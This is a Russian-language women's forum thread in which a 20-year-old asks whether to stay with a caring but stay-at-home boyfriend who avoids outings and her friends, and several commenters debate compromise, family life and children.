Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2016-12-03 13:29:26 от Гость
Здравствуйте мы смужем вместе 12 лет. есть двое детей. было всякое но последнее время стала очень мучить проблема отсутствия работы у мужа я работаю. в начале отношений училась потом была в декрете но потом постоянно работала чтобы ни случилось и как ... Подробнее
Последний комментарий
История : Мой курьезный случай
6 минут назад2016-12-05 11:41:19 от Арийка***
21694белая мышка, молодец бабушка) разнообразила вашу сексуальную жизнь) Все комментарии67576
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Советы
Любовь это безумия
пять часов назад2016-12-05 06:58:47
Любимый брат мужа
вчера в 21:17:222016-12-04 21:17:22
На работу к папе
03 декабря в 16:30:38
Студент и препод
28 ноября в 23:53:36
Волосенкиии
27 ноября в 22:35:51
Комедия
27 ноября в 16:31:09
Сериалы смотрим?  ( 1 2 )
27 ноября в 16:31:08
опустить на главную
24 ноября в 07:57:38
Советы - Подскажите как мне быть...
Советы : Подскажите как мне быть...     

Всем привет! Сейчас я вам изложу свою историю, может что-нибудь посоветуете, подскажете, как мне быть. Мне 20 лет, 4 года я встречалась с молодым человеком, ему 24. Взрослея, я понимала, что это не мое, что семьи у нас с ним не получится, я была морально сильнее его, а мне хотелось быть за своим мужчиной как за каменной стеной, но сейчас не об этом, в итоге мы расстались. Я встретила замечательного парня (как раз таки за ним я как за каменной стеной), ему 25 лет, мы вместе уже 5 месяцев, дело, можно сказать, идет к свадьбе, но возникла такая проблема, из-за которой я и задумалась, а стоит ли продолжать с ним отношения и тем более создавать семью. Может кто-то скажет, что это бред, но для меня это важно. А дело вот в чем, у нас с ним разные взгляды на жизнь, он не пьет (ну, изредка может бутылочку пива выпить), гулять не любит (только пройтись вдвоем со мной по улице). Встретиться с моими друзьями это для него трагедия, а я привыкла к тому, что в прошлых отношениях, например, мы часто гуляли. У бывшего парня было много друзей, большая компания, я не говорю там о таких гулянках, где все (извиняюсь) нажираются, нет, мы ездили отдыхать на природу, на шашлыки, в ночные, выпивали, конечно, не без этого, но все цивильно, часто собирались у кого-нибудь дома и тд. и тп., ну думаю, вы поняли. А вот нынешний парень вообще презирает все этакие гуляния и «выпивания», а мне так этого не хватает. Мои друзья  нас зовут то в гости, то на шашлыки, то в кафешке посидеть, но парень этого не хочет. Посидеть выпить, расслабиться он тоже не хочет даже просто со мной вдвоем. И вот я не знаю, что делать, психи показывать я не хочу, хотя я еще та "психушка", разговаривать с ним я разговаривала, объясняла ему, что постоянно я не могу сидеть с ним дома. Я как бы под него подстроилась, что мы дома всегда, но можно же хоть раз (я не часто прошу) подстроиться под меня. В общем, он меня не понимает. Терять его не хочется, так-то он очень хороший парень…умный, заботливый. Семья у него хорошая. Я знакома с его родителями, он с моими тоже. Я уверена, что он будет хорошим мужем и отличным отцом наших детей, но вот это его нежелание выползать из дома меня не устраивает. В дальнейшем я бы хотела, что бы мы с моими замужними подругами, с его женатыми друзьями ходили бы друг к другу в гости, дружили бы семьями, а так, мы будем сидеть в нашей квартирке как в тюрьме. Еще немаловажный факт - он делает ремонт. Естественно, нужны не малые деньги. Может он экономит, но, во-первых, я не прошу его сильно тратиться, а, во-вторых, я тоже работаю и мы можем разделять наши затраты на кафе и тд. и тп.  пополам или же вообще я могу когда-нибудь взять все расходы на себя, но он же МУЖИК, а их унижает, если девушка платит! Ну да, я понимаю ремонт, нужны деньги, но они всю жизнь будут нужны, потом свадьба - нужны деньги, потом машину новую купить - нужны деньги, потом детей родить - нужны деньги, так всегда будет, но нельзя же вечно сидеть дома. Я люблю его, но данная ситуация заставила меня задуматься, а стоит ли продолжать отношения, потом же только хуже будет. Надеюсь вы меня поняли, я не какая-нибудь там «гуляка», я обычная девушка, которой тоже хочется изредка нарядиться и выйти в свет или просто посидеть в компании друзей, выпить, пообщаться…В общем, жду ваши комментарии, кто что скажет по данному поводу. Можно ли все изменить, что бы было комфортно обоим или же не тратить время на эти отношения, дальше труднее будет расстаться, если в итоге ничего не получится.  Забыла написать, а теперь и не знаю куда вставить – мой парень не любит заводить новые знакомства(он мне это говорил), вообще он себе внушил, что он плохо находит контакт с людьми, но это не так, я со стороны вижу, он всегда находит о чем поговорить с другими людьми (может конечно внутри он себя чувствует не комфортно, но визуально этого не заметно).

P.S. Спасибо за внимание! Строго не судите, писать не очень умею… и не осуждайте за то, что у меня такая ПРОБЛЕМА, для кого-то это может быть пустяк,…а у меня вот так…

 

61173
Другие Советы
(58)
Неалина
5436 Неалина
Неалина offline
Репутация : 443523
Комментариев 7621 30
28 сентября 2015 16:30:49
2015-09-28 16:30:49

Я смотрю автор на вас не угодишь. Один не надежный, но с ним весело. Другой надежный, но веселья не хватает.

Вот выйдите замуж, появятся дети и вам самой не когда будет по гостям ходить. Знаете пусть муж у вас лучше будет домашний, чем любитель по гостям ходить. Вы потом с детьми дома, а он по гостям.

Мужа выбирают для жизни, чтобы муж был хороший, любящий, заботливый, уважающий. Чтобы отцом хорошим был. А вы выбираете по тому как по гостям гулять.

Ответить
Поддерживаю Да5 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Burundik
19101 Burundik
Burundik online
Репутация : 293827
Комментариев 2305 6
28 сентября 2015 16:58:04
2015-09-28 16:58:04

мне кажется, что рано вам еще семью заводить, 20 лет всего - гуляйте!

Как по мне, так лучше парень домосед и не общительный, чем гуляка душа компании

Ответить
Поддерживаю Да5 / Нет0
Алеся
Алеся

28 сентября 2015 17:18:48
2015-09-28 17:18:48
Я вас очень хорошо поняла. Мне кажется, что вам нужно постараться на него повлиять. Например, мой папа не любит тратить деньги, ему нужны были новые штаны, родители нашли подходящие брюки, но они стоили дорого, но так как были хорошего качества, мама решила заплатить с ним наполовину. Мне нравиться как вы мыслите, вижу что старайтесь найти компромисс. Продолжайте в том же духе, надеюсь что у вас все получиться!
Ответить
Поддерживаю Да0 / Нет0
белая мышка
9141 белая мышка
Белая мышка online
Репутация : 141390
Комментариев 1509 25
28 сентября 2015 17:47:53
2015-09-28 17:47:53

Автор, у меня впечатление, как-будто Вы сейчас описывали моего бывшего парня. Похожий тип. Мне тоже нравилось что он не пьет, не гуляет, не тратит деньги на пустоту. А в итоге оказался запойным алкоголиком, который не умеет общаться с людьми, и у него совершенно нет друзей, еще и жадный. К тому же маменькин сынок. И очень-очень скрытный. Все это я узнала спустя год. Так вот, я к тому, что бы Вы не торопились с замужеством. Познакомьте с друзьями, узнайте получше его. 5 месяцев-это мало

Ответить
Поддерживаю Да1 / Нет1
казаться легкодоступной, но при этом быть недосягаемой-это верх искусства
Violetta
14552 Violetta
Violetta offline
Репутация : 1249193
Комментариев 8863 0
28 сентября 2015 18:24:07
2015-09-28 18:24:07

Ходите пока одна, а дальше, вот увидите, вам будет не до гулянок.

А вы любите своего парня?

Ответить
Поддерживаю Да1 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1663626
Комментариев 6917 36
28 сентября 2015 18:28:03
2015-09-28 18:28:03

А я вас понимаю автор. Мне бы тоже было тяжело каждый вечер сидеть дома и не общаться ни с кем кроме любимого. Человек - существо социальное, и порой мне просто необходимы шашлыки, поездки на майовки с компанией, игры в крокодила, походы в кафе, в кино. Я просто люблю собраться друзьями, скачать классный фильм, купить пива, несколько ведер попкорна и провести вечер просто и незамысловато, зато весело. Да даже банально на день города или на масленицу встретиться компанией, погулять, повеселиться...

Когд а парень домосед - это, наверное, хорошо для семейной жизни, но я бы устала быть всегда дома, быть только вдвоем. Поэтому я вас, автор, понимаю. Только не знаю, что посоветовать. Если чувства у вас не очень глубокие и отношениями вы не сильно дорожите, то, наверное, проще расстаться. Но проще - не всегда лучше. Попробуйте найти с ним какой-то компромисс. Объясните ему, что вам хочется иногда ходить куда-то, бывать где-то, общаться с кем-то. И он, даже если и не хочет, может делать иногда это ради вас. Пусть сразу и "через не хочу". Ведь вы тоже наверняка что-то делаете ради него тоже, чем-то поступаетесь или жертвуете. Вот и скажите ему об этом. А вдруг он раззнакомится с вашими друзьями, найдет какие-то точки соприкосновения, общие интересы. Но и вы в свою очередь следите, чтобы ему было комфортно в компании, лишний раз заговорите с ним, обнимите, улыбнитесь, возьмите за руку незаметно. Чтобы он чувствовал, что вдвоем можно быть даже тогда, когда вокруг много людей.

Удачи вам.

Ответить
Поддерживаю Да2 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
28 сентября 2015 18:36:03
2015-09-28 18:36:03

Вы не нагулялись еще. Скучно конечно сидеть только дома, но если такой у вас парень, врятли он сильно измениться.

Ответить
Поддерживаю Да2 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
"Я"
"Я"

28 сентября 2015 19:45:42
2015-09-28 19:45:42
Согласно с Неалиной полностью!Мой муж тоже не любитель гулянок, тоже когда вышла замуж переживала по этому поводу, но мало ли семьи которое расстаются из за гулянок и алкоголя!Не найдеш ты на 100процентов идеального мужа. Представь себе когда ты дома будешь сидеть с грудничком, а он будет гулять со своими дружками и выпивать. Хочешь сидеть плакать и ждать когда же он вернется и в каком состоянии?Про расстовании даже не думай!Лучше домашний и трудоголик чем гулящий и тусовщик!Разве ты не согласна?
Ответить
Поддерживаю Да2 / Нет0
Гость
Гость

28 сентября 2015 19:45:49
2015-09-28 19:45:49
Я считаю, что всего должно быть в меру и погулять и дома посидеть. Тем более у Вас пока нет детей, вы молоды. Так что, автор, советую вам сесть и серьёзно поговорить с вашим молодом человеком. Ведь можно договориться ходить куда-то хотя бы раз в две-три недели, ничего потерпит, вы то терпите намного дольше, а если он вас не поддержит в этом, значит такой челок Вам не нужен. Получается он не уважает ваши желания и хочет чтобы было комфортно только ему, а на ваши чувства ему наплевать. Удачи вам! :-*
Ответить
Поддерживаю Да1 / Нет0
Гостья
Гостья

28 сентября 2015 19:46:21
2015-09-28 19:46:21
Да автор, вы еще не готовы к семейной жизни. Это ведь не просто штамп, это действительно узы:различные обязанности, возможное материнство, больше ответственности, а вы все об отдыхе планируете.
Ответить
Поддерживаю Да0 / Нет0
Блондиночка
10883 Блондиночка
Блондиночка offline
  • Мисс Остроумие
Репутация : 2895502
Комментариев 17168 30
28 сентября 2015 20:38:38
2015-09-28 20:38:38

А по мне так Ваш парень самое то - для семейной жизни.

Сама я, не люблю парней, про которых говорят - душа компании.. Таким всю жизнь нужны будут бесконечные гульки и посиделки.

Я ничего против не имею того, чтобы иногда встретиться с друзьями. Но когда в отношениях, то мне самой все эти посиделки с друзьями с выпивонами - не по душе. Хоть я и гипер общительная при этом. Просто не любитель такого рода проведение досуга.

А Вы автор, на мой взгляд, просто не готова к семейной жизни. Ведь отношения не заключаются в весёлых посиделках с друзьями. В первую очередь это совместный быт и взаимоотношения между вами. Это ценно. То что внутри пары. Его отношение к Вам... И прочие нюансы. Ведь всю жизнь шашлыки на даче у друзей не станешь жарить.

Ответить
Поддерживаю Да5 / Нет0
Хожу по дому на каблуках и пью кефир из фужера. Это придаёт моему безделью особую изысканность.
Неалина
5436 Неалина
Неалина offline
Репутация : 443523
Комментариев 7621 30
29 сентября 2015 05:02:46
2015-09-29 05:02:46

"Я", У меня второй что называется компанейский парень. Ну и?Семейная жизнь с ним не сложилась. Ему скучно дома. Как я забеременела так и все рушится стало, родила еще хуже.

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Scientific
6424 Scientific
Scientific offline
Репутация : 230647
Комментариев 3219 0
29 сентября 2015 09:20:30
2015-09-29 09:20:30

"мы вместе уже 5 месяцев... "
ЦЕЛЫХ ПЯТЬ.
А ха ха ха

В принципе Вы даже рановато начали розовые очки снимать.
По-идее ситуацию можно и выправить и научиться подстраиваьтся друг под друга. На данной стадии порекомендую Вам честно и откровенно (вот как нам) описать ему эту проблему и отрпавить в письме. Правда постарайтесь описать поконкретнее (на уровне директив) чего Вы от него хотите. Я думаю он не должен Вам отказать в любезности.

Ответить
Поддерживаю Да0 / Нет0
окса
1342 окса
Окса offline
Репутация : 202880
Комментариев 1799 1
29 сентября 2015 12:09:00
2015-09-29 12:09:00

А у вашего парня друзья есть?

Ответить
Поддерживаю Да0 / Нет0
Все вокруг такие злые, а я одна такая добрая и хорошая... сижу тихонько в танке .... отстреливаюсь))
Tatosha
20178 Tatosha
Tatosha offline
Репутация : 340
Комментариев 10 2
29 сентября 2015 15:03:39
2015-09-29 15:03:39

белая мышка, а как его звали? {#}

Ответить
Поддерживаю Да0 / Нет0
Tatosha
20178 Tatosha
Tatosha offline
Репутация : 340
Комментариев 10 2
29 сентября 2015 15:07:48
2015-09-29 15:07:48

Scientific , написав "мы вместе уже 5 месяцев" я не имела ввиду что это капец как МНОГО!{#} Глаза разуй, я до него 4 года встречалась с парнем!

Ответить
Поддерживаю Да0 / Нет0
Tatosha
20178 Tatosha
Tatosha offline
Репутация : 340
Комментариев 10 2
29 сентября 2015 15:11:50
2015-09-29 15:11:50

окса, да, есть 2 лучших друга, ну и, как у всех, есть еще просто хорошие знакомые. Одного друга лично знаю, мой молодой человек нас знакомил. Но дело в том, что они то живут не в моем городе и он очень редко с ними видится.

Ответить
Поддерживаю Да0 / Нет0
Tatosha
20178 Tatosha
Tatosha offline
Репутация : 340
Комментариев 10 2
29 сентября 2015 15:14:54
2015-09-29 15:14:54

Всем спасбо за коментарии. Не все конечно меня поняли, но я, видимо, мысль свою плохо изложила. Дело даже не в гулянках-выпивалках. Он не хочет даже просто сходить в кино со мной... у нас в городе открыли супер океанариум, я его туда звала, он не захотел {#} А для меня важны такие мероприятия{#}

Ответить
Поддерживаю Да0 / Нет0
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
29 сентября 2015 18:21:27
2015-09-29 18:21:27

Tatosha, вы же сама сказала что он ремонт делает, экономит, какое кино и океанариум?

Ответить
Поддерживаю Да0 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
Scientific
6424 Scientific
Scientific offline
Репутация : 230647
Комментариев 3219 0
01 октября 2015 09:24:04
2015-10-01 09:24:04

Tatosha, перечитал: "...4 года я встречалась с молодым человеком, ему 24. Взрослея, я понимала, что это не мое, что семьи у нас с ним не получится, я была морально сильнее его, а мне хотелось быть за своим мужчиной как за каменной стеной, но сейчас не об этом, в итоге мы расстались. Я встретила замечательного парня (как раз таки за ним я как за каменной стеной), ему 25 лет, мы вместе уже 5 месяцев... "

Ответить
Поддерживаю Да0 / Нет0
Неалина
5436 Неалина
Неалина offline
Репутация : 443523
Комментариев 7621 30
01 октября 2015 09:52:13
2015-10-01 09:52:13

Tatosha, Сейчас для вас важны такие мероприятия. , пока у вас детей нет. Когда будут дети другие ценности появятся, чтобы муж дома был и вам помогал. Вы видимо думаете, что так как сейчас всегда будет?

Что вас не устраивает?Вы хотели мужчину и быть за ним как за каменной стеной, первый вас не устраивал. Сейчас вы встретили такого какого хотели опять не устраивает, У каждого есть минусы и плюсы. Поймите что идеальных во всем нет людей. Есть просто такие черты с которыми вы можете мирится, а есть такие что мирись не мирись ничего хорошего не выйдет. Ну вот не любит он у вас ходить везде как вы. Ходите с подругой погуляйте. пусть он дома там сидит ремонт делает. Он же пьет где то, не по женщинам таскается, вас не бьет. Если честно я вас автор не пойму, честно. Сами пишите "Я встретила замечательного парня. "Дак радуйтесь, не всем такие попадаются. Будете копатся потеряете его, найдете такого что будете плакать и вспоминать его и думать что пусть бы лучше этот который дома ремонт делал с вами был и не ходилникуда, чем любитель гулять.

Если честно мне все равно какой выбор вы автор сделаете. Лишь бы вам потом не пожалеть о своем выборе.

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1663626
Комментариев 6917 36
01 октября 2015 10:14:47
2015-10-01 10:14:47

Неалина, Да ладно. Вас (вышеотписавшихся) послушать, так жизнь есть, только пока детей нет. А появляются дети и все: ничего не надо, никуда не хочется, все привычки меняются, как и характер, темперамент и все остальное.

У меня почти все подруги уже с детьми. У парня тоже несколько близких друзей женатых пар с детьми. И в баню вместе ходим, и на каток зимой, и на природу с ночевкой ездим, и в кабак иногда заходим посидеть, самбуки бахнуть. Недавно эти женатые родители детей оставили своих чад бабушкам и (правда без нас) ходили в ночной клуб, где отрывались до утра.

А вас послушать, так мне никогда и рожать не захочется. Это у вас пока детей нет... а родите и все... тушите свет, пиши пропало))).

Не у всех так, так что не нужно всех судить по себе.

И еще, все автора упрекают, что на на парня бочку катит за то, что он просто не гулящий. По-моему, между не гулящий и нелюдимый, как наш учитель русского языка в шутку говорил 2 большие разницы. Вы почему-то рассматриваете только крайности. Если бы он был не такой "дикий", значит обязательно гулял бы беспробудно, пока автор дома нянчила бы потомство. К чему эти крайности? Одно тело таскаться каждый день с друзьями по полночи, и совсем другое, что ее парень совершенно не с кем не хочет проводить время, кроме нее. Никогда. В кино сходить не может. Это ненормально, я так считаю.

Если человек замкнутый и нелюдимый, то дети здесь не при чем. Он и с ними и без них будет такой. А общительный, активный и жизнерадостный и после родов не закроется в четырех стенах.

Ответить
Поддерживаю Да1 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1663626
Комментариев 6917 36
01 октября 2015 10:24:46
2015-10-01 10:24:46

Тем более, автор писала " В дальнейшем я бы хотела, что бы мы с моими замужними подругами, с его женатыми друзьями ходили бы друг к другу в гости, дружили бы семьями, а так, мы будем сидеть в нашей квартирке как в тюрьме. "

А вы видите только то, что хотите видеть: автор гулящая, встретила нормального мужика и ерепенится.

У всех есть кумовья, друзья детства какие-то, мужа какие-то друзья с женами. Даже если не по барам ходить, но в гости ходите же друг к другу, с детьми, или на природу, или в парке погулять. Дети по-своему играют, взрослые по-своему. Неужели у вас такого нет?

Все родили и сидите вдвоем с мужем, вернее втроем с ребенком ежедневно и еженощно смотрите друг на друга в своей квартире и в мир носа не высовываете? Это мрак, а не жизнь.

Ответить
Поддерживаю Да2 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Неалина
5436 Неалина
Неалина offline
Репутация : 443523
Комментариев 7621 30
01 октября 2015 10:36:52
2015-10-01 10:36:52

Сиреневая Кошка, Автору же не понравился тот предыдущий с которым было весело и ходил с ней везде. Когда маленькие дети не до гуляний. Я об этом. Я не говорю, что вообще потом никуда не ходить. Но при маленьких детях не все гулять ходят. Лишний раз уже и не выйдешь туда куда хочется.

Еще можно предположить, что возможно ему ее друзья по просту не нравятся или нет общих интересов с ними. А еще может он и правда экономит на ремонт или что то еще и это просто отговорки с его стороны.

Просто автор поговорите с вашим любимым, тут можно месяцами спорить между собой и все будут смотреть со своей стороны. Но как на самом деле вам может сказать только он. Только скажите ему чтобы он вам правду сказал. А там и выводы сделаете.

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
01 октября 2015 10:46:18
2015-10-01 10:46:18

Разве можно объяснить человеку без детей, как оно на самом деле. Что бы выйти погулять, надо этих бабушек допроситься. Не у всех эти бабушки есть вообще . А первое время, когда малыш маленький, ты от усталости не то что гулять, до ванны с трудом добираешься, а если живешь только с мужем и ребенком, то и все остальные заботы по дому на тебе. А у некоторых бабушек вообще мнение, "вы рожали, вы и сидите, я тоже еще молодая" Лично в моей ситуации, мы живем в разных городах, и даже за хлебом ходим с ребенком (когда не в садике). Так как даже 5летнего ребенка оставить дома одного страшно, мама за порог, а дите сразу во все тяжкие))))) и тюбик зубной пасты съест, хрени в уши и нос напихает, волосы подстричь может и т. д. Конечно не всем так "везет" кто то с родителями живет и гуляет каждую неделю, у кого то бабушки на пенсии, им в радость с малышом сидеть. Ситуации разные и спорить с кем то и что то доказывать не имея в этом опыта, глупо и бессмысленно.

Ответить
Поддерживаю Да2 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1663626
Комментариев 6917 36
01 октября 2015 10:51:27
2015-10-01 10:51:27

Неалина, Вы вообще историю читали? Она говорит, что с бывшим парнем они часто гуляли, была у них большая компания. Но не понравился он ей не из-за этого. А по другим совсем причинам.

Я тоже с бывшим ездила на природу на 3-4 дня, к друзьям в Киев ездили, где целыми днями гуляли по городу, на елку ходили, в аквапарк... Мы расстались (по другим причинам, разумеется). И что с того? С новым парнем я тоже езжу на природу, в аквапарк и на каток. Если я рассталась с бывшим, потому что мы с ним не сошлись в вопросах быта, но у меня с ним была активная жизнь, то что из этого следует по вашей логике? Что мой новый парень должен быть нелюдимым и шарахаться моих друзей?

Вообще, честно, НИ О ЧЕМ.

Ответить
Поддерживаю Да1 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1663626
Комментариев 6917 36
01 октября 2015 10:58:56
2015-10-01 10:58:56

Ночная Фурия, Вот именно, вы, не зная ситуации автора, уже решили, что это она пока гулять хочет, пока детей нерт. А родит и ей сразу будет не до гулей.

Может ее ребенка будет 2 бабушки, 2 дедушки и 8 прабабушек, которым за счастье будет дите поняньчить? И вообще, она даже не писала, что собирается в ближайшем будущем рожать. Девочке, на минуточку, 20 лет всего.

Меня просто удивляет, что уже знают, что автор не сегодня-завтра родит, и ребенка ей оставить будет обязательно не с кем, и гулять ей вообще не захочется и будет не до того. Да и вообще, радоваться нужно, что муж никуда категорически не хочет ходить. Потому что среднего не дано. Если бы он не был таким диким, значит точно был бы гулякой и повесой.

Логика некоторых поражает просто.

Ответить
Поддерживаю Да3 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Неалина
5436 Неалина
Неалина offline
Репутация : 443523
Комментариев 7621 30
01 октября 2015 11:01:04
2015-10-01 11:01:04

Сиреневая Кошка, Я читала. Я пытаюсь сказать, что все не идеальны и у каждого свои минусы. С одними минусами можно мирится с другими нет. Идеальных нет. Вы таких встречали?Я нет.

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Неалина
5436 Неалина
Неалина offline
Репутация : 443523
Комментариев 7621 30
01 октября 2015 11:02:14
2015-10-01 11:02:14

Сиреневая Кошка, Не логика опыт.

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Неалина
5436 Неалина
Неалина offline
Репутация : 443523
Комментариев 7621 30
01 октября 2015 11:02:51
2015-10-01 11:02:51

Сиреневая Кошка, логика у вас. Пока опыта у вас на этот счет нет.

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1663626
Комментариев 6917 36
01 октября 2015 11:04:03
2015-10-01 11:04:03

Неалина, На какой счет у меня нет опыта?

Ответить
Поддерживаю Да0 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
01 октября 2015 11:08:18
2015-10-01 11:08:18

Сиреневая Кошка, ага, {#} лично вам, ничего не писала, ваш ник не вставляла, в чем проблема? Меня тоже одного человека на сайте, рассуждения вымораживают в некоторых история, но я же не переключаюсь на нее и не пытаюсь чем то уколоть. Может не стоит придираться? Всего доброго.

Ответить
Поддерживаю Да0 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1663626
Комментариев 6917 36
01 октября 2015 11:10:51
2015-10-01 11:10:51

Ночная Фурия, Никаких проблем, я разве говорила, чо у меня проблема? Я вас не колю. Я высказываю свое мнение. Если вы ранимая такая, что к вам можно обращаться только после того, как обратились вы, то простите.

Всего доброго и вам.

Ответить
Поддерживаю Да0 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
01 октября 2015 11:16:11
2015-10-01 11:16:11

Сиреневая Кошка, Я не ранимая, )))) я бан не хочу.

Ответить
Поддерживаю Да0 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1663626
Комментариев 6917 36
01 октября 2015 11:36:06
2015-10-01 11:36:06

Ладно, никого не хотела обидеть. Я все никак не привыкну, что некоторые пользователи впадают в транс, если к ним обратиться и сказать, что с ним не согласна. Я лично против вас Неалина, и против васНочная Фурия, ничего не имею. Так что не нужно обижаться.

Я просто пыталась вам сказать, что автор не говорит, что ей нужны бары, пьянки, компании каждый день. Она всего лишь сказала, что ей не нравится, что ее жених нелюдимый и вообще никуда не ходит, что не может встретиться с друзьями, даже вдвоем с ней в кино не может сходить. Она хотела бы общаться семьями, с семейными парами в будущем (я уверена, что у каждой из вас есть несколько семейных пар, может, с детьми, с которыми общаетесь и вы и ваши дети). Парень автора хочет всегда сидеть дома или пройтись с ней вдвоем. Вот что говорила автор.

Неалина, Если вы имеете ввиду, что у меня нет детей и нет опыта, то автор и не спрашивала, как воспитывать детей. Она о детях вообще ни слова не сказала.

Но если все же говорить о детях, то у моей кумы их двое, оставить их не с кем, на сирота, у мужа мать - инвалид, у еще одной подруги - девочка 12 лет, я ее знаю почти с рождения и все это время с подругой общалась и с ее мужем, еще у одной мальчик - 3 года, у сестер по сыну - 7 и 6 лет, у еще одной подруги - девочка 4 года... у парня 2 пары близких друзей - семейные пары с ребенком.

Я со всеми из тех, кого перечислила, близко общаюсь. И когда дети были совсем маленькими и сейчас. Ни одна не закрылась дома с мужем, все как-то выкручиваются, либо в гости приходят, либо к себе зовут, либо детвору подкидывают на вечер родителям, либо с детьми идут гулять, да мало ли... Если вы вышли замуж, родили ребенка и сидите дома, муж-ребенок и больше никаких контактов, никакого досуга, никаких развлечений. Если это так, то мне вас искренне жаль. Честно, это я без издевки говорю, я таких людей не знаю и не представляю, как это можно так жить.

У моих друзей, сестер, знакомых, у парня моего друзей, у всех есть не только дети, но еще и жизнь какая-то. Парня друзья вчера звонили и говорили, что мы зануды и домоседы, засели с ремонтом со своим и уже месяц к ним в гости не приходили. У них есть сын, но он нам не мешает, он нам рад, особенно мне).

Поэтому вам не удасться меня убедить, что это я так рассуждаю, пока не родила, а вот рожу и сразу начну покрываться пылью дома с ребенком. Потому что я точно знаю, что этого не будет.

Я еще раз извиняюсь, если кто-то там обиделся на меня. Никого не хотела обидеть.

Ответить
Поддерживаю Да2 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
01 октября 2015 12:11:37
2015-10-01 12:11:37

Сиреневая Кошка, ни кто на вас не обижался, просто мнения и взгляды разошлись. Вы если что то вас неустраивает в комментариях, резковато отвечаете, это понравится не может. Если Автор стала встречаться с таким 'нелюдимым" парнем, как многие его тут считают, то где же она с ним познакомилась и каким чудом вытянула на свидание. У них явно расходятся взгляды про погулять, ну если он не любит гулять в таком количестве, можно и одной пойти, он начнет ревновать и будет ходить с ней. Хотя честно говоря, я думаю он комплексует из за нехватки денег, что бы сделать ремонт надо не мало.

Ответить
Поддерживаю Да2 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
01 октября 2015 12:15:42
2015-10-01 12:15:42

Сиреневая Кошка, и еще, отдых на который берут детей, отдыхом не считаю, это одна морока. Мама я хочу в туалет, мама мне скучно, мама дай мне то, дай мне это, я устала, хочу домой, он меня обижает, поиграй со мной и это даже если идем к паре с детьми. Дурдом короче.

Ответить
Поддерживаю Да2 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1663626
Комментариев 6917 36
01 октября 2015 12:30:00
2015-10-01 12:30:00

Ночная Фурия, Я не резковато отвечаю, я в принципе так общаюсь, редко сюскаю. Я когда пишу, у меня нет намерения кому-то нахамить или оскорбить. Я рассуждаю просто и говорю, что думаю. В жизни проблем не бывает, а в интернете часто начинают губы дуть. Это бесит, скажу честно. Если челоек такой ранимый, что к нему и обратиться нельзя первой, или так остро реагирует, что с ним кто-то не согласен, нужно сразу предупреждать.

Ответить
Поддерживаю Да0 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Гость
Гость

01 октября 2015 12:47:01
2015-10-01 12:47:01
Сиреневая Кошка, Вы меня поняли как никто! Я уж было подумала «неужели я такая дура, сделала проблему на ровном месте, не гулящий и, слава богу». По поводу отдыха с детьми у нас с Вами мысли сходятся. Я вообще сужу по своим родителям, когда мы с братом были маленькие, они дома не высиживали, так же ездили отдыхать с такими же семьями с детьми, не только по местности на природу, даже в отпуск на море компаниями ездили и ничуть мы не мешали им.
Ответить
Поддерживаю Да0 / Нет0
Tatosha
